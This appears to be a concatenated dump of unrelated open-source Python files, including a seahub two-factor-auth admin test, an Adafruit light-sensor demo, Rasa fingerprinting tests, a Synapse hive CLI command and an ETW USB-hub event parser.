print(SimpleServer.Signature(message, sec))
|
tests/api/endpoints/admin/test_two_factor_auth.py | weimens/seahub | 420 | 32731 | <reponame>weimens/seahub
import os
import pytest
from django.urls import reverse
from seahub.options.models import (UserOptions, KEY_FORCE_2FA, VAL_FORCE_2FA)
from seahub.test_utils import BaseTestCase
from seahub.two_factor.models import TOTPDevice, devices_for_user
TRAVIS = 'TRAVIS' in os.environ
@pytest.mark.skipif(TRAVIS, reason="")
class TwoFactorAuthViewTest(BaseTestCase):
def setUp(self):
self.login_as(self.admin)
def test_can_disable_two_factor_auth(self):
totp = TOTPDevice(user=self.admin, name="", confirmed=1)
totp.save()
devices = devices_for_user(self.admin)
i = 0
for device in devices_for_user(self.admin):
if device:
i+=1
assert i > 0
resp = self.client.delete(reverse('two-factor-auth-view', args=[str(self.admin.username)]))
assert resp.status_code == 200
i = 0
for device in devices_for_user(self.admin):
if device:
i+=1
assert i == 0
def tearDown(self):
try:
for device in devices_for_user(self.admin):
device.delete()
except:
pass
def test_force_2fa(self):
assert len(UserOptions.objects.filter(email=self.user.email,
option_key=KEY_FORCE_2FA)) == 0
resp = self.client.put(
reverse('two-factor-auth-view', args=[self.user.username]),
'force_2fa=1',
'application/x-www-form-urlencoded',
)
self.assertEqual(200, resp.status_code)
assert len(UserOptions.objects.filter(email=self.user.email,
option_key=KEY_FORCE_2FA)) == 1
resp = self.client.put(
reverse('two-factor-auth-view', args=[self.user.username]),
'force_2fa=0',
'application/x-www-form-urlencoded',
)
self.assertEqual(200, resp.status_code)
assert len(UserOptions.objects.filter(email=self.user.email,
option_key=KEY_FORCE_2FA)) == 0
|
Introducing_CircuitPlaygroundExpress/CircuitPlaygroundExpress_LightSensor_cpx.py | joewalk102/Adafruit_Learning_System_Guides | 665 | 32781 | # CircuitPlaygroundExpress_LightSensor
# reads the on-board light sensor and graphs the brighness with NeoPixels
import time
from adafruit_circuitplayground.express import cpx
from simpleio import map_range
cpx.pixels.brightness = 0.05
while True:
# light value remaped to pixel position
peak = map_range(cpx.light, 10, 325, 0, 9)
print(cpx.light)
print(int(peak))
for i in range(0, 9, 1):
if i <= peak:
cpx.pixels[i] = (0, 255, 0)
else:
cpx.pixels[i] = (0, 0, 0)
time.sleep(0.01)
|
tests/engine/training/test_fingerprinting.py | fintzd/rasa | 9,701 | 32787 | import inspect
from unittest.mock import Mock
from _pytest.monkeypatch import MonkeyPatch
from rasa.core.policies.ted_policy import TEDPolicy
from rasa.engine.training import fingerprinting
from rasa.nlu.classifiers.diet_classifier import DIETClassifier
from rasa.nlu.selectors.response_selector import ResponseSelector
from tests.engine.training.test_components import FingerprintableText
def test_fingerprint_stays_same():
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, TEDPolicy.get_default_config(), {"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, TEDPolicy.get_default_config(), {"input": FingerprintableText("Hi")},
)
assert key1 == key2
def test_fingerprint_changes_due_to_class():
key1 = fingerprinting.calculate_fingerprint_key(
DIETClassifier,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
ResponseSelector,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("Hi")},
)
assert key1 != key2
def test_fingerprint_changes_due_to_config():
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
ResponseSelector,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("Hi")},
)
assert key1 != key2
def test_fingerprint_changes_due_to_inputs():
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
key2 = fingerprinting.calculate_fingerprint_key(
ResponseSelector,
TEDPolicy.get_default_config(),
{"input": FingerprintableText("bye")},
)
assert key1 != key2
def test_fingerprint_changes_due_to_changed_source(monkeypatch: MonkeyPatch):
key1 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
get_source_mock = Mock(return_value="other implementation")
monkeypatch.setattr(inspect, inspect.getsource.__name__, get_source_mock)
key2 = fingerprinting.calculate_fingerprint_key(
TEDPolicy, {}, {"input": FingerprintableText("Hi")},
)
assert key1 != key2
get_source_mock.assert_called_once_with(TEDPolicy)
|
indra/assemblers/tsv/__init__.py | zebulon2/indra | 136 | 32798 | from .assembler import TsvAssembler
|
graphgallery/utils/ipynb.py | EdisonLeeeee/GraphGallery | 300 | 32824 | from IPython import get_ipython
from IPython.display import display
def is_ipynb():
return type(get_ipython()).__module__.startswith('ipykernel.')
|
homeassistant/components/ripple/__init__.py | domwillcode/home-assistant | 30,023 | 32833 | <gh_stars>1000+
"""The ripple component."""
|
synapse/cmds/hive.py | ackroute/synapse | 216 | 32834 | <filename>synapse/cmds/hive.py
import os
import json
import shlex
import pprint
import asyncio
import tempfile
import functools
import subprocess
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.lib.cmd as s_cmd
import synapse.lib.cli as s_cli
ListHelp = '''
Lists all the keys underneath a particular key in the hive.
Syntax:
hive ls|list [path]
Notes:
If path is not specified, the root is listed.
'''
GetHelp = '''
Display or save to file the contents of a key in the hive.
Syntax:
hive get [--file] [--json] {path}
'''
DelHelp = '''
Deletes a key in the cell's hive.
Syntax:
hive rm|del {path}
Notes:
Delete will recursively delete all subkeys underneath path if they exist.
'''
EditHelp = '''
Edits or creates a key in the cell's hive.
Syntax:
hive edit|mod {path} [--string] ({value} | --editor | -f {filename})
Notes:
One may specify the value directly on the command line, from a file, or use an editor. For the --editor option,
the environment variable VISUAL or EDITOR must be set.
'''
class HiveCmd(s_cli.Cmd):
'''
Manipulates values in a cell's Hive.
A Hive is a hierarchy persistent storage mechanism typically used for configuration data.
'''
_cmd_name = 'hive'
_cmd_syntax = (
('line', {'type': 'glob'}), # type: ignore
)
def _make_argparser(self):
parser = s_cmd.Parser(prog='hive', outp=self, description=self.__doc__)
subparsers = parser.add_subparsers(title='subcommands', required=True, dest='cmd',
parser_class=functools.partial(s_cmd.Parser, outp=self))
parser_ls = subparsers.add_parser('list', aliases=['ls'], help="List entries in the hive", usage=ListHelp)
parser_ls.add_argument('path', nargs='?', help='Hive path')
parser_get = subparsers.add_parser('get', help="Get any entry in the hive", usage=GetHelp)
parser_get.add_argument('path', help='Hive path')
parser_get.add_argument('-f', '--file', default=False, action='store',
help='Save the data to a file.')
parser_get.add_argument('--json', default=False, action='store_true', help='Emit output as json')
parser_rm = subparsers.add_parser('del', aliases=['rm'], help='Delete a key in the hive', usage=DelHelp)
parser_rm.add_argument('path', help='Hive path')
parser_edit = subparsers.add_parser('edit', aliases=['mod'], help='Sets/creates a key', usage=EditHelp)
parser_edit.add_argument('--string', action='store_true', help="Edit value as a single string")
parser_edit.add_argument('path', help='Hive path')
group = parser_edit.add_mutually_exclusive_group(required=True)
group.add_argument('value', nargs='?', help='Value to set')
group.add_argument('--editor', default=False, action='store_true',
help='Opens an editor to set the value')
group.add_argument('--file', '-f', help='Copies the contents of the file to the path')
return parser
async def runCmdOpts(self, opts):
line = opts.get('line')
if line is None:
self.printf(self.__doc__)
return
core = self.getCmdItem()
try:
opts = self._make_argparser().parse_args(shlex.split(line))
except s_exc.ParserExit:
return
handlers = {
'list': self._handle_ls,
'ls': self._handle_ls,
'del': self._handle_rm,
'rm': self._handle_rm,
'get': self._handle_get,
'edit': self._handle_edit,
'mod': self._handle_edit,
}
await handlers[opts.cmd](core, opts)
@staticmethod
def parsepath(path):
''' Turn a slash-delimited path into a list that hive takes '''
return path.split('/')
async def _handle_ls(self, core, opts):
path = self.parsepath(opts.path) if opts.path is not None else None
keys = await core.listHiveKey(path=path)
if keys is None:
self.printf('Path not found')
return
for key in keys:
self.printf(key)
async def _handle_get(self, core, opts):
path = self.parsepath(opts.path)
valu = await core.getHiveKey(path)
if valu is None:
self.printf(f'{opts.path} not present')
return
if opts.json:
prend = json.dumps(valu, indent=4, sort_keys=True)
rend = prend.encode()
elif isinstance(valu, str):
rend = valu.encode()
prend = valu
elif isinstance(valu, bytes):
rend = valu
prend = pprint.pformat(valu)
else:
rend = json.dumps(valu, indent=4, sort_keys=True).encode()
prend = pprint.pformat(valu)
if opts.file:
with s_common.genfile(opts.file) as fd:
fd.truncate(0)
fd.write(rend)
self.printf(f'Saved the hive entry [{opts.path}] to {opts.file}')
return
self.printf(f'{opts.path}:\n{prend}')
async def _handle_rm(self, core, opts):
path = self.parsepath(opts.path)
await core.popHiveKey(path)
async def _handle_edit(self, core, opts):
path = self.parsepath(opts.path)
if opts.value is not None:
if opts.value[0] not in '([{"':
data = opts.value
else:
data = json.loads(opts.value)
await core.setHiveKey(path, data)
return
elif opts.file is not None:
with open(opts.file) as fh:
s = fh.read()
if len(s) == 0:
self.printf('Empty file. Not writing key.')
return
data = s if opts.string else json.loads(s)
await core.setHiveKey(path, data)
return
editor = os.getenv('VISUAL', (os.getenv('EDITOR', None)))
if editor is None or editor == '':
self.printf('Environment variable VISUAL or EDITOR must be set for --editor')
return
tnam = None
try:
with tempfile.NamedTemporaryFile(mode='w', delete=False) as fh:
old_valu = await core.getHiveKey(path)
if old_valu is not None:
if opts.string:
if not isinstance(old_valu, str):
self.printf('Existing value is not a string, therefore not editable as a string')
return
data = old_valu
else:
try:
data = json.dumps(old_valu, indent=4, sort_keys=True)
except (ValueError, TypeError):
self.printf('Value is not JSON-encodable, therefore not editable.')
return
fh.write(data)
tnam = fh.name
while True:
retn = subprocess.call(f'{editor} {tnam}', shell=True)
if retn != 0: # pragma: no cover
self.printf('Editor failed with non-zero code. Aborting.')
return
with open(tnam) as fh:
rawval = fh.read()
if len(rawval) == 0: # pragma: no cover
self.printf('Empty file. Not writing key.')
return
try:
valu = rawval if opts.string else json.loads(rawval)
except json.JSONDecodeError as e: # pragma: no cover
self.printf(f'JSON decode failure: [{e}]. Reopening.')
await asyncio.sleep(1)
continue
# We lose the tuple/list distinction in the telepath round trip, so tuplify everything to compare
if (opts.string and valu == old_valu) or (not opts.string and s_common.tuplify(valu) == old_valu):
self.printf('Valu not changed. Not writing key.')
return
await core.setHiveKey(path, valu)
break
finally:
if tnam is not None:
os.unlink(tnam)
|
etl/parsers/etw/Microsoft_Windows_USB_USBHUB.py | IMULMUL/etl-parser | 104 | 32870 | <filename>etl/parsers/etw/Microsoft_Windows_USB_USBHUB.py
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-USB-USBHUB
GUID : 7426a56b-e2d5-4b30-bdef-b31815c1a74a
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=1, version=0)
class Microsoft_Windows_USB_USBHUB_1_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_USB_HubDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=2, version=0)
class Microsoft_Windows_USB_USBHUB_2_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / CString,
"fid_USBHUB_Hub" / Int32sl
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=3, version=0)
class Microsoft_Windows_USB_USBHUB_3_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_USB_HubDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=10, version=0)
class Microsoft_Windows_USB_USBHUB_10_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=11, version=0)
class Microsoft_Windows_USB_USBHUB_11_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=12, version=0)
class Microsoft_Windows_USB_USBHUB_12_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=13, version=0)
class Microsoft_Windows_USB_USBHUB_13_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=14, version=0)
class Microsoft_Windows_USB_USBHUB_14_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=15, version=0)
class Microsoft_Windows_USB_USBHUB_15_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=16, version=0)
class Microsoft_Windows_USB_USBHUB_16_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=17, version=0)
class Microsoft_Windows_USB_USBHUB_17_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=18, version=0)
class Microsoft_Windows_USB_USBHUB_18_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=19, version=0)
class Microsoft_Windows_USB_USBHUB_19_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=20, version=0)
class Microsoft_Windows_USB_USBHUB_20_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=21, version=0)
class Microsoft_Windows_USB_USBHUB_21_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=22, version=0)
class Microsoft_Windows_USB_USBHUB_22_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=23, version=0)
class Microsoft_Windows_USB_USBHUB_23_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=24, version=0)
class Microsoft_Windows_USB_USBHUB_24_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=25, version=0)
class Microsoft_Windows_USB_USBHUB_25_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=26, version=0)
class Microsoft_Windows_USB_USBHUB_26_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=27, version=0)
class Microsoft_Windows_USB_USBHUB_27_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=28, version=0)
class Microsoft_Windows_USB_USBHUB_28_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=29, version=0)
class Microsoft_Windows_USB_USBHUB_29_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=30, version=0)
class Microsoft_Windows_USB_USBHUB_30_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=31, version=0)
class Microsoft_Windows_USB_USBHUB_31_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=32, version=0)
class Microsoft_Windows_USB_USBHUB_32_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=33, version=0)
class Microsoft_Windows_USB_USBHUB_33_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=34, version=0)
class Microsoft_Windows_USB_USBHUB_34_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=35, version=0)
class Microsoft_Windows_USB_USBHUB_35_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=36, version=0)
class Microsoft_Windows_USB_USBHUB_36_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=37, version=0)
class Microsoft_Windows_USB_USBHUB_37_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=39, version=0)
class Microsoft_Windows_USB_USBHUB_39_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=40, version=0)
class Microsoft_Windows_USB_USBHUB_40_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=41, version=0)
class Microsoft_Windows_USB_USBHUB_41_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=49, version=0)
class Microsoft_Windows_USB_USBHUB_49_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=50, version=0)
class Microsoft_Windows_USB_USBHUB_50_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=51, version=0)
class Microsoft_Windows_USB_USBHUB_51_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=59, version=0)
class Microsoft_Windows_USB_USBHUB_59_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=60, version=0)
class Microsoft_Windows_USB_USBHUB_60_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=61, version=0)
class Microsoft_Windows_USB_USBHUB_61_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=62, version=0)
class Microsoft_Windows_USB_USBHUB_62_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=63, version=0)
class Microsoft_Windows_USB_USBHUB_63_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=64, version=0)
class Microsoft_Windows_USB_USBHUB_64_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=70, version=0)
class Microsoft_Windows_USB_USBHUB_70_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=71, version=0)
class Microsoft_Windows_USB_USBHUB_71_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=80, version=0)
class Microsoft_Windows_USB_USBHUB_80_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_PortAttributes" / Int16ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=81, version=0)
class Microsoft_Windows_USB_USBHUB_81_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=82, version=0)
class Microsoft_Windows_USB_USBHUB_82_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=83, version=0)
class Microsoft_Windows_USB_USBHUB_83_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=84, version=0)
class Microsoft_Windows_USB_USBHUB_84_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=100, version=0)
class Microsoft_Windows_USB_USBHUB_100_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_USBHUB_Device_State" / Guid,
"fid_DeviceDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=101, version=0)
class Microsoft_Windows_USB_USBHUB_101_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / CString,
"fid_USBHUB_Device" / Int32sl
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=102, version=0)
class Microsoft_Windows_USB_USBHUB_102_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_USBHUB_Device_State" / Guid,
"fid_DeviceDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=103, version=0)
class Microsoft_Windows_USB_USBHUB_103_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_DeviceDescription" / WString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=110, version=0)
class Microsoft_Windows_USB_USBHUB_110_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=111, version=0)
class Microsoft_Windows_USB_USBHUB_111_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=112, version=0)
class Microsoft_Windows_USB_USBHUB_112_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=113, version=0)
class Microsoft_Windows_USB_USBHUB_113_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=114, version=0)
class Microsoft_Windows_USB_USBHUB_114_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_DeviceDescription" / WString
)
